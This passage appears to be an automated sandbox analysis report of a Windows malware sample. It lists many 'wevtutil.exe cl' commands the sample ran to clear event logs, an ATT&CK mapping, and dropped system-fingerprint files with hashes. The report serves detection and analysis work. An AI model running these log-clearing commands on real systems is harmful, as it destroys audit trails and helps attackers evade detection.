  wevtutil.exe cl "Microsoft-Windows-UserPnp/ActionCenter"
  2⤵
  PID:2688
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceInstall"
  2⤵
  PID:2008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
  2⤵
  PID:4972
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
  2⤵
  PID:4060
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
  2⤵
  PID:3392
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UxInit/Diagnostic"
  2⤵
  PID:3732
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
  2⤵
  PID:4128
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
  2⤵
  PID:2976
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
  2⤵
  PID:1764
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VHDMP-Analytic"
  2⤵
  PID:4780
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VHDMP-Operational"
  2⤵
  - Clears Windows event logs
  PID:4584
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VIRTDISK-Analytic"
  2⤵
  PID:4924
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VPN-Client/Operational"
  2⤵
  PID:4616
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VPN/Operational"
  2⤵
  PID:3360
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
  2⤵
  PID:2628
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VerifyHardwareSecurity/Admin"
  2⤵
  PID:2852
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VerifyHardwareSecurity/Operational"
  2⤵
  - Clears Windows event logs
  PID:1608
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-Volume/Diagnostic"
  2⤵
  PID:2564
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
  2⤵
  PID:1384
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Analytic"
  2⤵
  PID:1104
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
  2⤵
  PID:2284
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
  2⤵
  PID:404
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
  2⤵
  PID:2580
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WCNWiz/Analytic"
  2⤵
  PID:1668
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WEPHOSTSVC/Operational"
  2⤵
  PID:4416
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WER-PayloadHealth/Operational"
  2⤵
  - Clears Windows event logs
  PID:1212
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
  2⤵
  PID:4868
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
  2⤵
  PID:4156
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
  2⤵
  PID:3384
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
  2⤵
  PID:3880
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WLAN-Driver/Analytic"
  2⤵
  PID:1108
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WLAN-MediaManager/Diagnostic"
  2⤵
  PID:4836
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
  2⤵
  PID:2180
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Debug"
  2⤵
  PID:220
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Operational"
  2⤵
  PID:1328
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
  2⤵
  PID:2336
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
  2⤵
  PID:312
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
  2⤵
  PID:4116
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
  2⤵
  PID:3368
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Operational"
  2⤵
  PID:3364
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
  2⤵
  PID:5008
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WPD-API/Analytic"
  2⤵
  PID:3492
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
  2⤵
  PID:4576
- C:\Windows\system32\wevtutil.exe
  wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
  2⤵
  PID:3104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Power Settings

T1653

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

System Time Discovery

T1124

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\cpuid.txt

Filesize
62B

MD5
5fd4497719e0e0300234874b82948028

SHA1
79a508141429a3d7727ec5117013cc834450d838

SHA256
6b78ef4c1e67ff9ef2e24f1f0c97a7635df9bb50e9ca8a6d9a246014e049415b

SHA512
8fd289d630d05fd5ef4e9ef1d280e87253ee6044edfbdc1d372fcc23bd3a8a42a2591b9147a601dc405c24ddb1aed116cfa1bc374a69eaaa8e927dfc8984e49b

Download Submit
C:\Users\Admin\AppData\Local\Temp\hwid.txt

Filesize
6B

MD5
bea07e6d2b8dce396fe21baa61b34956

SHA1
665332b36fc8fa1ed11210cdee83b639b451e592

SHA256
2e08d1f6000aef541797d008c05ac36f4dbebfb36cbac5615788e6fcc5b300a7

SHA512
4ad82fbef6d8d3f4d0b90a9399c8b405674bad0c750e385fb034e57895838fd26d7926f6ed0ccab2e2afcaf4a23613ed8f16d909bff870b40187e22e0a6362c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\pcname.txt

Filesize
10B

MD5
c83e2e8bc05aeee7f49365f142479c4d

SHA1
827b4a758dfde66e73068b77645767460b55edce

SHA256
3d53d8b4886bbcae1acc1b326d4687927123764ce89c8570c7ec9dbc79b1fcf1

SHA512
ca4b0699fd0f10a2e4b96db499968c55408b73d269d1658d2307597b7f2ffa681c33cf53e6b2ce87377a5fd8bb94d7692e9cd91b4c9f795ffb812085640ad4c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\pcusername.txt

Filesize
8B

MD5
141da184787dc8ca600176c3aee1f3c1

SHA1
b706d3e6731230aae0a9985a259196e44adb352a

SHA256
6e993fdb3ecfa0a64860c8707fb14ef5a29c191c356bbb472a679f44cef63687

SHA512
49e55bbf9cb908603027d878e93ef31824aa21a069a542d95250ddda696f80e3c1cf0c89d1f9c524ed8c476be5a05a99977cb9925a26fc9b5b9016e8775194bf

Download Submit